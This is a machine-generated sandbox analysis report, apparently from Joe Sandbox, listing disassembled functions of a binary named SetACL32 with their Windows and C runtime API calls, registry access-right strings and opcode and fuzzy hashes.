                • Opcode ID: 539b6c7a63d9946b5830510c2c6616cc8f43c39de9e8d2cfd396a6b68794ba22
                • Instruction ID: 47b6070a21375878d7433f76816241e6ec56d737ed0b2683af214058494c74ec
                • Opcode Fuzzy Hash: 539b6c7a63d9946b5830510c2c6616cc8f43c39de9e8d2cfd396a6b68794ba22
                • Instruction Fuzzy Hash: 80E0927250022CFBCA022F50EE0AF8D3F18EB0AB25B044014F6076627587686910FBE2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F96C0B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                Download Yara Rule
                APIs
                • _free.LIBCMT ref: 00F96C14
                  • Part of subcall function 00F9800F: HeapFree.KERNEL32(00000000,00000000,?,00F96ACD), ref: 00F98025
                  • Part of subcall function 00F9800F: GetLastError.KERNEL32(?,?,00F96ACD), ref: 00F98037
                • _free.LIBCMT ref: 00F96C27
                • _free.LIBCMT ref: 00F96C38
                • _free.LIBCMT ref: 00F96C49
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 48f5bad2e7cdfb24531655f2e183637dfc8c2653a5bea0eb3522200299468b3f
                • Instruction ID: d0cbfa8e48485813d3f969437733dfbba42cae8da63c2cf67f82c3e473e3f8fc
                • Opcode Fuzzy Hash: 48f5bad2e7cdfb24531655f2e183637dfc8c2653a5bea0eb3522200299468b3f
                • Instruction Fuzzy Hash: 20E046BEC041289A9A122F18BE03C893B25E705742F090406F4009B23ECB39091BFFC0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F9D204 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 230COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: H_prolog3_
                • String ID: @M)w
                • API String ID: 2427045233-1211491014
                • Opcode ID: 0bd1e75cb429f70dce89e238a5097975d6e31a6a5feff54b7ee0b2a51afc0870
                • Instruction ID: 2a0ca550a2ebeead8b60d91e3648cef8325908a71e4c2ca9628c46a95cdb8826
                • Opcode Fuzzy Hash: 0bd1e75cb429f70dce89e238a5097975d6e31a6a5feff54b7ee0b2a51afc0870
                • Instruction Fuzzy Hash: F871B175D0021A9BEF24DF98C880BFEB7B5AF55360F344129E910A7280DB76AC45EB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F9555D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • __startOneArgErrorHandling.LIBCMT ref: 00F955ED
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorHandling__start
                • String ID: pow
                • API String ID: 3213639722-2276729525
                • Opcode ID: 5500a582e357a8a2293979def69270bb028607efa9f61cd03235dd37a28032d9
                • Instruction ID: 7b4d25d9162213a458efc7454d69ebcba54af56244132982351aaf8864bd7da6
                • Opcode Fuzzy Hash: 5500a582e357a8a2293979def69270bb028607efa9f61cd03235dd37a28032d9
                • Instruction Fuzzy Hash: 00517C62E0950586FF17FB18CD4136A7BA0EB40B60F644D59F0C2822A9EB358C95FF46
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F7123D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 127COMMON
                Download Yara Rule
                APIs
                • std::locale::_Init.LIBCPMT ref: 00F71246
                  • Part of subcall function 00F89DCB: __EH_prolog3.LIBCMT ref: 00F89DD2
                  • Part of subcall function 00F89DCB: std::_Lockit::_Lockit.LIBCPMT ref: 00F89DDD
                  • Part of subcall function 00F89DCB: std::locale::_Setgloballocale.LIBCPMT ref: 00F89DF8
                  • Part of subcall function 00F89DCB: std::_Lockit::~_Lockit.LIBCPMT ref: 00F89E4E
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Lockitstd::_std::locale::_$H_prolog3InitLockit::_Lockit::~_Setgloballocale
                • String ID: KEY_QUERY_VALUE$`
                • API String ID: 1737263090-3949433271
                • Opcode ID: d7a53a08bb69f563883b92e7ab555f932fece84d76a042068893aea548b70b9c
                • Instruction ID: 7d5b16d336dedd829bc8ac4fa155041d91e0e9708058629b803f53c49975a724
                • Opcode Fuzzy Hash: d7a53a08bb69f563883b92e7ab555f932fece84d76a042068893aea548b70b9c
                • Instruction Fuzzy Hash: 82517031A002188BDB24DF68CC95BA9B7B1BF45314F1481DAD90DAB392DB35AE85DF41
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F7135F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 127COMMON
                Download Yara Rule
                APIs
                • std::locale::_Init.LIBCPMT ref: 00F71368
                  • Part of subcall function 00F89DCB: __EH_prolog3.LIBCMT ref: 00F89DD2
                  • Part of subcall function 00F89DCB: std::_Lockit::_Lockit.LIBCPMT ref: 00F89DDD
                  • Part of subcall function 00F89DCB: std::locale::_Setgloballocale.LIBCPMT ref: 00F89DF8
                  • Part of subcall function 00F89DCB: std::_Lockit::~_Lockit.LIBCPMT ref: 00F89E4E
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Lockitstd::_std::locale::_$H_prolog3InitLockit::_Lockit::~_Setgloballocale
                • String ID: KEY_SET_VALUE$d
                • API String ID: 1737263090-3572923805
                • Opcode ID: c3cd5470b54e2a3c9e054b41be3011e1791e45e07f0a1e0df44ea3cde6e586d6
                • Instruction ID: 0ab467eb81a3ee3e9f96a600093c824080abcd2dd164cb53aed1134eb974bfd9
                • Opcode Fuzzy Hash: c3cd5470b54e2a3c9e054b41be3011e1791e45e07f0a1e0df44ea3cde6e586d6
                • Instruction Fuzzy Hash: D4516E31A012288FDB24DF68CC95BA9B7B1BF45314F1481EAD90DAB391DB31AE85DF41
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F7147B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 127COMMON
                Download Yara Rule
                APIs
                • std::locale::_Init.LIBCPMT ref: 00F71484
                  • Part of subcall function 00F89DCB: __EH_prolog3.LIBCMT ref: 00F89DD2
                  • Part of subcall function 00F89DCB: std::_Lockit::_Lockit.LIBCPMT ref: 00F89DDD
                  • Part of subcall function 00F89DCB: std::locale::_Setgloballocale.LIBCPMT ref: 00F89DF8
                  • Part of subcall function 00F89DCB: std::_Lockit::~_Lockit.LIBCPMT ref: 00F89E4E
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Lockitstd::_std::locale::_$H_prolog3InitLockit::_Lockit::~_Setgloballocale
                • String ID: KEY_CREATE_SUB_KEY$h
                • API String ID: 1737263090-3856693117
                • Opcode ID: f7eda6e9b4616b139be81c20f8d0414fd933742734eb4736a5ee13b545942de1
                • Instruction ID: 716d07f9b9a6ecd0261017c3fd3d98574fee4e413e7b79fac0ab0f6205152b66
                • Opcode Fuzzy Hash: f7eda6e9b4616b139be81c20f8d0414fd933742734eb4736a5ee13b545942de1
                • Instruction Fuzzy Hash: C3517F71E002248BDB28DF28CC95B99B7B1BF45314F0881DAD80AAB291DB31AE45DF51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F7158D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 127COMMON
                Download Yara Rule
                APIs
                • std::locale::_Init.LIBCPMT ref: 00F71596
                  • Part of subcall function 00F89DCB: __EH_prolog3.LIBCMT ref: 00F89DD2
                  • Part of subcall function 00F89DCB: std::_Lockit::_Lockit.LIBCPMT ref: 00F89DDD
                  • Part of subcall function 00F89DCB: std::locale::_Setgloballocale.LIBCPMT ref: 00F89DF8
                  • Part of subcall function 00F89DCB: std::_Lockit::~_Lockit.LIBCPMT ref: 00F89E4E
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Lockitstd::_std::locale::_$H_prolog3InitLockit::_Lockit::~_Setgloballocale
                • String ID: KEY_ENUMERATE_SUB_KEYS$l
                • API String ID: 1737263090-1063618012
                • Opcode ID: f4ab26f429c93b4340bd2a2f20d67eaf6c4632cdcc23508a6199522b30943e9f
                • Instruction ID: 625e3fa61f3144f3e2da5533d08b390bb4fdb0b97fd61d3d1011f69482d00bf7
                • Opcode Fuzzy Hash: f4ab26f429c93b4340bd2a2f20d67eaf6c4632cdcc23508a6199522b30943e9f
                • Instruction Fuzzy Hash: 31515B71E002288BDB28DF28CC55BA9B7B1BF45314F0881EAD949AB291DB31AE45DF51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F7169F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 127COMMON
                Download Yara Rule
                APIs
                • std::locale::_Init.LIBCPMT ref: 00F716A8
                  • Part of subcall function 00F89DCB: __EH_prolog3.LIBCMT ref: 00F89DD2
                  • Part of subcall function 00F89DCB: std::_Lockit::_Lockit.LIBCPMT ref: 00F89DDD
                  • Part of subcall function 00F89DCB: std::locale::_Setgloballocale.LIBCPMT ref: 00F89DF8
                  • Part of subcall function 00F89DCB: std::_Lockit::~_Lockit.LIBCPMT ref: 00F89E4E
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Lockitstd::_std::locale::_$H_prolog3InitLockit::_Lockit::~_Setgloballocale
                • String ID: KEY_NOTIFY$p
                • API String ID: 1737263090-1166435531
                • Opcode ID: 7173b3542b89243507428edf54f1494e63e21d1ad9825b79e53e063bf5171e2b
                • Instruction ID: 53ad2bdc6abc514acd9a75e36835d07e66020171d6d6413b41a831ce000dd0ec
                • Opcode Fuzzy Hash: 7173b3542b89243507428edf54f1494e63e21d1ad9825b79e53e063bf5171e2b
                • Instruction Fuzzy Hash: B2515E31E00228CBDB28DF68CC55BA9B7B2BF44314F0481EAD94DAB291DB31AE45DF51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F717B1 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 127COMMON
                Download Yara Rule
                APIs
                • std::locale::_Init.LIBCPMT ref: 00F717BA
                  • Part of subcall function 00F89DCB: __EH_prolog3.LIBCMT ref: 00F89DD2
                  • Part of subcall function 00F89DCB: std::_Lockit::_Lockit.LIBCPMT ref: 00F89DDD
                  • Part of subcall function 00F89DCB: std::locale::_Setgloballocale.LIBCPMT ref: 00F89DF8
                  • Part of subcall function 00F89DCB: std::_Lockit::~_Lockit.LIBCPMT ref: 00F89E4E
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Lockitstd::_std::locale::_$H_prolog3InitLockit::_Lockit::~_Setgloballocale
                • String ID: KEY_CREATE_LINK$t
                • API String ID: 1737263090-3987958626
                • Opcode ID: 8be2fd47a3f543a7dcef1632c8d7060d59c4563f28dc4b7c3655dab8b2823d58
                • Instruction ID: 8b3f45b72ffb3d2c7919ea99688e65f0a379de0b65de9132f8f2bd4611aaee3b
                • Opcode Fuzzy Hash: 8be2fd47a3f543a7dcef1632c8d7060d59c4563f28dc4b7c3655dab8b2823d58
                • Instruction Fuzzy Hash: 3D516D71E00228CFDB24DB68CC55BA8B7B1BF44314F0881DAD949AB391DB35AE45DF52
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F7192F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 127COMMON
                Download Yara Rule
                APIs
                • std::locale::_Init.LIBCPMT ref: 00F71938
                  • Part of subcall function 00F89DCB: __EH_prolog3.LIBCMT ref: 00F89DD2
                  • Part of subcall function 00F89DCB: std::_Lockit::_Lockit.LIBCPMT ref: 00F89DDD
                  • Part of subcall function 00F89DCB: std::locale::_Setgloballocale.LIBCPMT ref: 00F89DF8
                  • Part of subcall function 00F89DCB: std::_Lockit::~_Lockit.LIBCPMT ref: 00F89E4E
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Lockitstd::_std::locale::_$H_prolog3InitLockit::_Lockit::~_Setgloballocale
                • String ID: WRITE_DAC$z
                • API String ID: 1737263090-1919552622
                • Opcode ID: ad8ffac67c897775e85e1873c4f2fc3690293ee64689f6aefc9fee61e5ea1de0
                • Instruction ID: b014b9064e662d8549b6687106f04d93013257bd5c172d68862225c896f1ed88
                • Opcode Fuzzy Hash: ad8ffac67c897775e85e1873c4f2fc3690293ee64689f6aefc9fee61e5ea1de0
                • Instruction Fuzzy Hash: F5516E31E00228CBEB28DF68CC55B99B7B1BF44314F0481EAD949AB391DB35AE45DF51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00FA4C42 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,7FFFFFFF), ref: 00FA4D5F
                • __dosmaperr.LIBCMT ref: 00FA4D66
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast__dosmaperr
                • String ID: @M)w
                • API String ID: 1659562826-1211491014
                • Opcode ID: df5b6acc597352744fdd739d0f520308bb7f348cdaed46ae595e011d968fba30
                • Instruction ID: d85ab9ba4b46983143aaf331dc4ed938c665dcb19bbcc5b78de919f31cec1358
                • Opcode Fuzzy Hash: df5b6acc597352744fdd739d0f520308bb7f348cdaed46ae595e011d968fba30
                • Instruction Fuzzy Hash: 63417CB1A04155AFDB11DF28CC82BB97FE5EFC7310F284158E8858B242D3B5AD11B790
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F8E5D4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00F8E5F9
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: EncodePointer
                • String ID: MOC$RCC
                • API String ID: 2118026453-2084237596
                • Opcode ID: 19d6763ecd1688f2e265e9db118c4f78a9c70be3f47d5d61b839cac27a31c96a
                • Instruction ID: 30ceee53f681ffa17291d5303951e35d739e30735f5d381356c57e19a457dd7c
                • Opcode Fuzzy Hash: 19d6763ecd1688f2e265e9db118c4f78a9c70be3f47d5d61b839cac27a31c96a
                • Instruction Fuzzy Hash: 0F415671D00209EFCF16EF98CD81AEEBBB5BF68314F198059F914A6261E3359950EB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00FA15A8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104fileCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • WriteFile.KERNEL32(?,?,00000000,?,00000000,00FA18F1,?,00000000,00000000,?,?,00000000,00000000,?,?,00000008), ref: 00FA1691
                • GetLastError.KERNEL32(00FA18F1,?,00000000,00000000,?,?,00000000,00000000,?,?,00000008,?,?,?,?,?), ref: 00FA16C1
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorFileLastWrite
                • String ID: @M)w
                • API String ID: 442123175-1211491014
                • Opcode ID: 54ad0eabcca7c9ee2e2daa4c4c19ca61044933b3c836532254a47d1b5e62f652
                • Instruction ID: 15d585b70b8b0080ec9716d486fbcf6b5d6d326350f637291cd9f25f4430f7ac
                • Opcode Fuzzy Hash: 54ad0eabcca7c9ee2e2daa4c4c19ca61044933b3c836532254a47d1b5e62f652
                • Instruction Fuzzy Hash: 86318FB1A00219AFDB24CF69CC91BE977B9FB48310F1944A9E905D73A0D670AE849B60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00FA14BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82fileCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,?,00FA18E1,?,00000000,00000000,?,?,00000000), ref: 00FA1569
                • GetLastError.KERNEL32(?,00FA18E1,?,00000000,00000000,?,?,00000000,00000000,?,?,00000008,?,?,?,?), ref: 00FA158F
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorFileLastWrite
                • String ID: @M)w
                • API String ID: 442123175-1211491014
                • Opcode ID: 6887e04548e59350de0ce80bff0cb2c44ef8c9332f0b7cb1aa6a53631499800b
                • Instruction ID: a0a376906ab1198450f255d2614ac1a401dbe27deab895d217336d52b2943597
                • Opcode Fuzzy Hash: 6887e04548e59350de0ce80bff0cb2c44ef8c9332f0b7cb1aa6a53631499800b
                • Instruction Fuzzy Hash: 2C217371E002189FCB25DF19DC819E9B3B9FF89314F1544AAE90AD7250D730DE85DB51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00FA13E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80fileCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,?,00FA1901,?,00000000,00000000,?,?,00000000), ref: 00FA1480
                • GetLastError.KERNEL32(?,00FA1901,?,00000000,00000000,?,?,00000000,00000000,?,?,00000008,?,?,?,?), ref: 00FA14A6
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorFileLastWrite
                • String ID: @M)w
                • API String ID: 442123175-1211491014
                • Opcode ID: fd39be504da8cd15c7da5dc0ba758ce48b008d57187e4f6dac66240c426f10c7
                • Instruction ID: a28c550416293f6b291221aa0569075e319bf326033724cb16f2ee3d0aa3e8bf
                • Opcode Fuzzy Hash: fd39be504da8cd15c7da5dc0ba758ce48b008d57187e4f6dac66240c426f10c7
                • Instruction Fuzzy Hash: 2A21BF70A102189BCB15CF29CC80AE9B7B9FB4E311F2541A9ED06D7211D630DE46DB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F67580 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79windowCOMMON
                Download Yara Rule
                APIs
                • FormatMessageA.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000,746D712B,?,?,?,?,?,00FA9D0D,000000FF), ref: 00F675C4
                • LocalFree.KERNEL32(00000000,asio.system error,00000011,?,?,?,?,?,00FA9D0D,000000FF), ref: 00F67658
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: FormatFreeLocalMessage
                • String ID: asio.system error
                • API String ID: 1427518018-3828095645
                • Opcode ID: b9e54ebc1cec38584a9fbc483118fc490f62917325d620985e567709b39f93c6
                • Instruction ID: 4ad8266bf7c5040ee3e83c6f3f68027463ca254320a2b369555b0fb661e39a35
                • Opcode Fuzzy Hash: b9e54ebc1cec38584a9fbc483118fc490f62917325d620985e567709b39f93c6
                • Instruction Fuzzy Hash: 7B3127B1A08746AFE711CF18CC04FAABBB9FF45324F144259E8109B3C0D7B6A900DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F61550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • std::_Lockit::_Lockit.LIBCPMT ref: 00F6157B
                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00F615CA
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                • String ID: bad locale name
                • API String ID: 3988782225-1405518554
